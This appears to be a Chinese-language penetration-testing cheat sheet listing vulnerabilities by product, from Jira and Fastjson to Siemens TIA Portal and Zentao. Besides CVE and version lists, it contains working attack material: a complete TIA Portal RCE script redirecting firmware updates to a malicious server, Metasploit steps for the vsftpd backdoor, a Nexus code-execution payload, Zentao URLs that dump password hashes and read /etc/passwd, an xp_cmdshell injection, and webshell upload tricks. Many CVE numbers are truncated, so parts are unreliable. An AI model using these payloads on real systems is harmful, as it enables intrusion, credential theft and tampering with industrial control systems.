jira
ssrf CVE-2019-8451
url = url + '/plugins/servlet/gadgets/makeRequest?url=' + host + '@www.baidu.com/' Jira未授权服务端模板注入远程代码执行漏洞(CVE-2019-11581)
Ueditor
任意文件上传
uchome
uchome 2.0 存在持久XSS漏洞
发布时间:--
在uchome 简体utf- .0测试IE6,IE7,IE8通过.
@import url(http://xxx.com/1.css); 包含远程css文件,可以在1.css中写入XSS利用.
分析代码 cp_theme.php 92行(17行调用)
Edge
Microsoft Edge 远程代码执行漏洞(CVE--)
大华摄像头
未授权访问漏洞
受影响:
DH-IPC-HDW23A0RN-ZS
DH-IPC-HDBW23A0RN-ZS
DH-IPC-HDBW13A0SN
DH-IPC-HDW13A0SN
DH-IPC-HFW13A0SN-W
DH-IPC-HDBW13A0SN
DH-IPC-HDW13A0SN
DH-IPC-HFW13A0SN-W
DHI-HCVR51A04HE-S3
DHI-HCVR51A08HE-S3
DHI-HCVR58A32S-S2
Exim邮件服务器
Exim deliver_message命令注入漏洞(CVE--)
DeleGate
DeleGate DNS消息解压远程拒绝服务漏洞 CVE-2005-0036
Fastjson
RCE
Fastjson < V1.2.48
Spring
Pivotal Spring Framework isWritableProperty SpEL 表达式注入漏洞(CVE--) CVE--
ImageMagick
RCE
CVE--
axis2
弱口令
任意文件读取
Awstats
路径泄露
http://www.xx.com.cn/cgi-bin/awstats.pl?config=xxx
ccs
注入
ISC BIND
TSIG缓冲区溢出漏洞
拒绝服务漏洞(CVE-2014-8500)
拒绝服务漏洞(cnvd-2018-17514)
ISC BIND安全限制绕过漏洞(CVE-2017-3143)
HFS
RCE
PHP
PHP7 zip组件整型溢出漏洞(CVE--) - > 可RCE - 影响范围是PHP 7.0.6版本以前的所有PHP 7.x 版本
phpmyadmin
弱口令
phpmoadmin
RCE
node.js
node.js v8 debugger RCE
Elasticsearch
RCE
未授权访问
任意文件读取
OpenSSLDrown
OpenSSL 1.0. through
1.0.1g OpenSSL 1.0. through 1.0.0l all versions before OpenSSL 0.9.8y
DROWN攻击漏洞(CVE--)
Openssh
libssh认证绕过(cve--)
ibssh 0.8.x - 0.8.
libssh 0.7.x - 0.7.
libssh 0.6.x"
Netgear
Netgear DGN1000B setup.cgi 远程命令注入漏洞
Bash
破壳漏洞(CVE--)
影响:
影响目前主流的Linux和Mac OSX操作系统平台,包括但不限于Redhat、CentOS、Ubuntu、Debian、Fedora、Amazon Linux、OS X .10等平台
Kubernetes
Kubernetes Kubernetes提权(CVE--)
Kubernetes v1..x-1.9.x Kubernetes v1.10.0-1.10. (fixed in v1.10.11)
Kubernetes v1.11.0-1.11. (fixed in v1.11.5) Kubernetes v1.12.0-1.12. (fixed in v1.12.3)
zabbix
latest sql注入漏洞
jsrpc sql注入漏洞
activemq
后台弱口令
RCE
任意文件上传
ActiveMQ物理路径泄漏
Fckeditor
https://www.jianshu.com/p/b0295978da77/fckeditor/editor/dialog/fck_about.html /FCKeditor/_whatsnew.html http://x.com/goldpen/editor/filemanager/browser/default/ #泄露源码文件 上传漏洞
http://www.xx.gov.cn/FCkeditor/editor/filemanager/upload/test1.html
访问进去直接上传图片格式木马。
http://www.xx.gov.cn/UploadFile/2.php;.gif
KingdEditor
XSS 上传漏洞
CuteEDitor
上传漏洞
编辑器Aspx版本
网上公布的CuteEditor漏洞,配合利用IIS .0解析漏洞获取Webshell
WAF防火墙免疫IIS6.0解析漏洞 -> 修改图片后缀绕过
Apache
Apache ActiveMQ .x ~ 5.14.
ActiveMQ任意文件文件移动漏洞 Apache ActiveMQ 5.13.0的版本之前的存在反序列化漏洞
ActiveMQ反序列化漏洞(CVE--) Apache ActiveMQ5.14.0 – 5.15.
ActiveMQ 信息泄漏漏洞(CVE--)
apache mod_jk apache mod_jk访问控制绕过漏洞(cve-2018-11759)
61616端口(ActiveMQ消息队列端口)
hudson
代码泄露
grafana
弱口令
Openssh
CVE--
CVE--
CVE--
CVE--
CVE--
CVE--
CVE--
CVE--
CVE--(提权)
Atlassian
CVE-2019-1158
docker
CVE-2018-15664
Siemens TIA Portal (STEP7)
RCE : CVE-2019-10915
##
# Exploit Title: Siemens TIA Portal remote command execution
# Date: 06/11/2019
# Exploit Author: Joseph Bingham
# CVE : CVE-2019-10915
# Advisory: https://www.tenable.com/security/research/tra-2019-33
# Writeup: https://medium.com/tenable-techblog/nuclear-meltdown-with-critical-ics-vulnerabilities-8af3a1a13e6a
# Affected Vendors/Device/Firmware:
# - Siemens STEP7 / TIA Portal
## ##
# Example usage
# $ python cve_2019_10915_tia_portal_rce.py
# Received '0{"sid":"ZF_W8SDLY3SCGExV9QZc1Z9-","upgrades":[],"pingInterval":25000,"pingTimeout":60000}'
# Received '40'
# Received '42[" ",{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":0},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":""},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":""},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},null]'
## import websocket, ssl, argparse parser = argparse.ArgumentParser()
parser.add_argument("target_host", help="TIA Portal host")
parser.add_argument("target_port", help="TIA Portal port (ie. 8888)", type=int)
parser.add_argument("update_server", help="Malicious firmware update server IP")
args = parser.parse_args() host = args.target_host
port = args.target_port
updatesrv = args.update_server
ws = websocket.create_connection("wss://"+host+":"+port+"/socket.io/?EIO=3&transport=websocket&sid=", sslopt={"cert_reqs": ssl.CERT_NONE})
#req = '42["cli2serv",{"moduleFunc":"ProxyModule.readProxySettings","data":"","responseEvent":" "}]'
#req = '42["cli2serv",{"moduleFunc":"ProxyModule.saveProxyConfiguration","data":{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":1},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":"10.0.0.200"},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":"8888"},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},responseEvent":" "}]'
req = 42["cli2serv",{"moduleFunc":"SoftwareModule.saveUrlSettings","data":{"ServerUrl":"https://"+updatesrv+"/FWUpdate/","ServerSource":"CORPORATESERVER","SelectedUSBDrive":"\\","USBDrivePath":"","downloadDestinationPath":"C:\\Siemens\\TIA Admin\\DownloadCache","isMoveDownloadNewDestination":true,"CyclicCheck":false,"sourcePath":"C:\\Siemens\\TIA Admin\\DownloadCache","productionLine":"ProductionLine1","isServerChanged":true},"responseEvent":" "}]'
ws.send(req) result = ws.recv()
print("Received '%s'" % result) result = ws.recv()
print("Received '%s'" % result) result = ws.recv()
print("Received '%s'" % result)
WinRAR
CVE-2018-2025(WinRAR RCE)
影响范围: WinRAR < 5.70 Beta 1 Bandizip < = 6.2.0.0 好压(2345压缩) < = 5.9.8.10907 360压缩 < = 4.0.0.1170
ghostscript
影响的版本 <= 9.23(全版本、全平台)
CVE-2017-8291
Ghostscript Ghostscript < 2017-04-26
Flash
CVE-2018-4878
项目地址:https://github.com/Sch01ar/CVE-2018-4878.git 影响版本为:Adobe Flash Player <= 28.0.0.137
Office
CVE-2017-11882(RCE)
漏洞影响版本:
Office 365
Microsoft Office 2000
Microsoft Office 2003
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016
vsftpd
vsftpd 2.3. - 笑脸漏洞
msfconsole
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set rhost IP
run
memcache
常用端口
未授权访问
memcache memcache drdos漏洞( B6-2018-030102)
1.4.31 memcache Memcached Append/prepend 远程代码执行漏洞(CVE-2016-8704)
1.4.31 memcache Memcache Update 远程代码执行漏洞(CVE-2016-8705)
1.4.31 memcache Memcache SASL身份验证远程代码执行漏洞(CVE-2016-8706)
jenkins
常用端口
未授权访问
反序列化
cve--
CVE--
GeoServer
1.弱口令
Javascript is required to actually use the GeoServer admin console. - 网站没有添加到可信任站点
2.XXE(版本小于2.7.1.1)
ccproxy
ccproxy6.0远程溢出
solr
未授权访问 CVE--12629 XXE & RCE CVE--0193 RCE
Secure File Transfe
version <= 0.18
CVE--
CVE-- version <= 0.20
CVE--
CVE--
CVE--
CVE--
Kibana
Elasticsearch Kibana本地文件包含漏洞(CVE--)
SCOoffice
SCOoffice Server "STARTTLS"纯文本注入漏洞
LIVE555
LIVE555 RTSP服务器缓冲区溢出漏洞(CVE--) -》 RCE
Ruby on Rails
Ruby on Rails 路径穿越与任意文件读取(CVE--)
Systemd
Systemd dns_packet_new函数堆缓冲区远程溢出漏洞 CVE--
影响范围:
Systemd 版本223,该版本早于 年 月,其后还包括 年 月 发布的Systemd 版本 该漏洞影响 Ubuntu 17.04 版和 16.10 版 ; Debian 版本 Stretch(又名Debian ),Buster(又名10)和 Sid(又名Unstable); 以及使用 Systemd 的各种其他 Linux 发行版
D-Link
D-Link DSL-2750B任意命令执行漏洞
金山安全套装
ksapi.sys对关键位置未保护,导致绕过限制
webTextbox编辑器
cookie欺骗
WebEditor
任意文件上传
http://nel.xx.com//main/model/newsoperation/webEditor/eWebEditor.jsp
GPON路由器
验证绕过漏洞(CVE--)
命令注入漏洞(CVE--)
Advantech Studio
Advantech Studio NTWebServer任意文件访问漏洞
受影响:
Advantech Advantech Studio 7.0
Nexus
CVE--7238
{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositioryName","value":"*"},{"property":"expression","value":"1.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":10}
通达OA
Office Anywhere 网络智能办公系统
路径泄漏问题,可以不需要权限登录到phpmyadmin 且权限为root
/mysql/main.php
源天OA
RCE
http://**.**.**.**:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27whoami%27
禅道
禅道 11.6.2
越权
http://127.0.0.1/zentaopms_11.6/www/api-getModel-user-getRealNameAndEmails-users=admin
注入
http://127.0.0.1/zentaopms_11.6/www/api-getModel-api-sql-sql=select+account,password+from+zt_user
任意文件读取
http://127.0.0.1/zentaopms_11.6/www/api-getModel-file-parseCSV-fileName=/etc/passwd
RCE
类型:
SQL注入 影响范围:
禅道9版本 前置条件:
/module/api/model.php payload:
/zentao/api-getModel-api-sql-sql=select+account+from+zt_user
FasterXML
Jackson-databind
CVE-2019-12384(RCE)
受影响版本
Jackson-databind 2.X < 2.9.9.1
不受影响版本
Jackson-databind 2.9.9.1
Jackson-databind 2.10